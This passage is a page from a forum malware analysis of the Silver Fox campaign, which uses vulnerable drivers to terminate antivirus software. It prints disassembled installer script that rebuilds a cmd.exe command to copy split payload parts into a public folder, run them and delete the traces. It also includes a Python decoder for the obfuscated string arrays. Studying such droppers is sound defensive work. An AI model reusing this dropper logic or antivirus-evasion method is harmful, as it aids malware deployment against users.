Topic: The ever-evolving Silver Fox: adding more and more vulnerable drivers to terminate antivirus software via BYOVD
Posted by z3960 on 2026-02-21 07:49
n Var11[7], S32(120)
assign Var11[8], S32(101)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
assign Var6, Var8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var6
pushvar Var8 ; StackCount = 10
call FILEEXISTS
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_47cd
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(0)
pushtype S32 ; StackCount = 11
assign Var11, S32(5)
pushtype UnicodeString_2 ; StackCount = 12
pushtype Type30 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype S32 ; StackCount = 15
assign Var15, S32(0)
pushvar Var14 ; StackCount = 16
call SETARRAYLENGTH
pop ; StackCount = 15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushvar Var12 ; StackCount = 14
call STRFROMCODE
pop ; StackCount = 13
pop ; StackCount = 12
pushtype UnicodeString_2 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(0)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
pushvar Var13 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype UnicodeString_2 ; StackCount = 14
assign Var14, Var6
pushvar Var8 ; StackCount = 15
call EXEC
pop ; StackCount = 14
pop ; StackCount = 13
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_47cd:
pushtype WideString ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(25)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(67)
assign Var11[1], S32(58)
assign Var11[2], S32(92)
assign Var11[3], S32(85)
assign Var11[4], S32(115)
assign Var11[5], S32(101)
assign Var11[6], S32(114)
assign Var11[7], S32(115)
assign Var11[8], S32(92)
assign Var11[9], S32(80)
assign Var11[10], S32(117)
assign Var11[11], S32(98)
assign Var11[12], S32(108)
assign Var11[13], S32(105)
assign Var11[14], S32(99)
assign Var11[15], S32(92)
assign Var11[16], S32(68)
assign Var11[17], S32(111)
assign Var11[18], S32(99)
assign Var11[19], S32(117)
assign Var11[20], S32(109)
assign Var11[21], S32(101)
assign Var11[22], S32(110)
assign Var11[23], S32(116)
assign Var11[24], S32(115)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
assign Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(8)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(92)
assign Var11[1], S32(109)
assign Var11[2], S32(101)
assign Var11[3], S32(110)
assign Var11[4], S32(46)
assign Var11[5], S32(101)
assign Var11[6], S32(120)
assign Var11[7], S32(101)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
assign Var5, Var8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var5
pushvar Var8 ; StackCount = 10
call FILEEXISTS
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_4c1a
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(0)
pushtype S32 ; StackCount = 11
assign Var11, S32(0)
pushtype UnicodeString_2 ; StackCount = 12
pushtype Type30 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype S32 ; StackCount = 15
assign Var15, S32(0)
pushvar Var14 ; StackCount = 16
call SETARRAYLENGTH
pop ; StackCount = 15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushvar Var12 ; StackCount = 14
call STRFROMCODE
pop ; StackCount = 13
pop ; StackCount = 12
pushtype UnicodeString_2 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(0)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
pushvar Var13 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype UnicodeString_2 ; StackCount = 14
assign Var14, Var5
pushvar Var8 ; StackCount = 15
call EXEC
pop ; StackCount = 14
pop ; StackCount = 13
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_4c1a:
ret
This function contains several ASCII-code arrays that are used to build strings and then carry out various operations.
Below are the decoded results of all the arrays and the strings they correspond to (byte 92 is a backslash and byte 34 is a double quote, both of which belong to the decoded text):
Array 1 (12 bytes)
  ASCII codes: 47, 99, 32, 99, 111, 112, 121, 32, 47, 98, 32, 34
  String: /c copy /b "
Array 2 (25 bytes)
  ASCII codes: 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115
  String: C:\Users\Public\Documents
Array 3 (13 bytes)
  ASCII codes: 92, 117, 110, 122, 105, 112, 46, 51, 34, 32, 43, 32, 34
  String: \unzip.3" + "
Array 4 (11 bytes)
  ASCII codes: 92, 117, 110, 122, 105, 112, 46, 50, 34, 32, 34
  String: \unzip.2" "
Array 5 (21 bytes)
  ASCII codes: 92, 102, 117, 110, 122, 105, 112, 46, 101, 120, 101, 34, 32, 38, 38, 32, 100, 101, 108, 32, 34
  String: \funzip.exe" && del "
Array 6 (9 bytes)
  ASCII codes: 92, 117, 110, 122, 105, 112, 46, 50, 34
  String: \unzip.2"
Array 7 (7 bytes)
  ASCII codes: 99, 109, 100, 46, 101, 120, 101
  String: cmd.exe
Array 8 (51 bytes)
  ASCII codes: 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68,
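Decoding these arrays by hand is tedious and error-prone (the forum rendering above already lost every backslash once), so an analyst normally scripts it. The following Python is an added example written for this page; it is not code from the post or from the malware. It parses the run-together Inno Setup compiled-script listing in the post's own syntax: a SETARRAYLENGTH call declares the length, a run of "assign VarN[i], S32(code)" stores the characters, and STRFROMCODE turns the array into a string. The names decode_arrays, DecodedArray, TOKEN and SAMPLE_LISTING are my own; the sample input is the 25-byte path array and the 8-byte "\men.exe" array copied from the listing above, with one line break deliberately left in the middle of a token the way the page splits lines. The declared length is checked against the number of elements actually stored, which catches arrays that the extraction truncated.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: two arrays in the style of the Inno Setup
# compiled-script listing in the post, instructions run together the way the
# forum page shows them, with one line break falling inside a token.
SAMPLE_LISTING = (
    "assign Var12, S32(25)pushvar Var11 ; StackCount = 13call SETARRAYLENGTH"
    "pop ; StackCount = 12pop ; StackCount = 11"
    "assign Var11[0], S32(67)assign Var11[1], S32(58)assign Var11[2], S32(92)"
    "assign Var11[3], S32(85)assign Var11[4], S32(115)assign Var11[5], S32(101)"
    "assign Var11[6], S32(114)assign Var11[7], S32(115)assign Var11[8], S32(92)"
    "assign Var11[9], S32(80)assign Var11[10], S32(117)assign Var11[11], S32(98)"
    "assign Var11[12], S32(108)assign Var11[13], S32(105)assign Var11[14], S32(99)"
    "assign Var11[15], S32(92)assign Var11[16], S32(68)assign Var11[17], S32(111)"
    "assign Var11[18], S32(99)assign Var11[19], S32(117)assign Var11[20], S32(109)"
    "assign Var11[21], S32(101)assign Var11[22], S32(110)assign Var11[23], S32(116)"
    "assign Var11[24], S32(115)assign Var10, Var11pop ; StackCount = 10"
    "pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10"
    "pop ; StackCount = 9assign Var8, Var9pop ; StackCount = 8"
    "pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10"
    "pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12"
    "assign Var12, S32(8)pushvar Var11 ; StackCount = \n13call SETARRAYLENGTH"
    "pop ; StackCount = 12pop ; StackCount = 11"
    "assign Var11[0], S32(92)assign Var11[1], S32(109)assign Var11[2], S32(101)"
    "assign Var11[3], S32(110)assign Var11[4], S32(46)assign Var11[5], S32(101)"
    "assign Var11[6], S32(120)assign Var11[7], S32(101)assign Var10, Var11"
    "pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODE"
    "pop ; StackCount = 10pop ; StackCount = 9add Var8, Var9pop ; StackCount = 8"
)

# The three instruction shapes the decoder cares about, in the listing's own
# syntax: the SETARRAYLENGTH call that declares an array's length, one element
# store, and the STRFROMCODE call that converts the array into a string.
TOKEN = re.compile(
    r"assign Var\d+, S32\((?P<length>\d+)\)pushvar Var\d+ ; StackCount = \d+call SETARRAYLENGTH"
    r"|assign Var(?P<var>\d+)\[(?P<idx>\d+)\], S32\((?P<code>\d+)\)"
    r"|call STRFROMCODE"
)


@dataclass
class DecodedArray:
    var: int                      # the VarN that held the character-code array
    declared_len: Optional[int]   # length passed to SETARRAYLENGTH, if one was seen
    text: str                     # characters decoded from the S32 codes

    @property
    def length_ok(self) -> bool:
        """True when the number of stored elements matches the declared length."""
        return self.declared_len == len(self.text)


def decode_arrays(listing: str) -> List[DecodedArray]:
    """Recover every character-code array from a run-together listing."""
    text = listing.replace("\n", "")   # the page breaks lines mid-token, so rejoin first
    found: List[DecodedArray] = []
    declared: Optional[int] = None
    var: Optional[int] = None
    codes: List[int] = []

    def flush() -> None:
        nonlocal var, codes
        if codes:
            found.append(DecodedArray(var, declared, "".join(chr(c) for c in codes)))
        var, codes = None, []

    for m in TOKEN.finditer(text):
        if m.group("length") is not None:        # a new array is declared
            flush()
            declared = int(m.group("length"))
        elif m.group("var") is not None:         # one element store
            v, idx = int(m.group("var")), int(m.group("idx"))
            if v != var or idx != len(codes):    # not a continuation of the current array
                flush()
                var = v
            codes.append(int(m.group("code")))
        else:                                    # STRFROMCODE closes the array
            flush()
    flush()
    return found


if __name__ == "__main__":
    for a in decode_arrays(SAMPLE_LISTING):
        status = "ok" if a.length_ok else "LENGTH MISMATCH"
        print(f"Var{a.var} ({a.declared_len} bytes, {status}): {a.text!r}")
```

Run on the sample it reports the two strings C:\Users\Public\Documents and \men.exe with both lengths matching. Pasting the whole listing from a thread page into SAMPLE_LISTING gives the same per-array table as the one above, and any array whose declared length does not match the stored element count is exactly the one cut off at a page boundary.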
(Page 11 of 23)
Replies (7):
7 # hanxiao129
02-22 20:31
Looks pretty good
6 # hanxiao129
02-22 20:30
Nice Silver Fox write-up
5 # hanxiao129
02-22 20:30
Thanks to the OP for sharing
4 # huwg
02-21 16:56
Thanks for sharing
3 # huwg
02-21 16:56
Having a look
2 # huwg
02-21 16:56
Came to take a look
1 # z3960
02-21 07:50
This function checks for the 360 main-protection process; if it is present, it cuts the network connection, as follows: the function calls the "IS360PROCES ..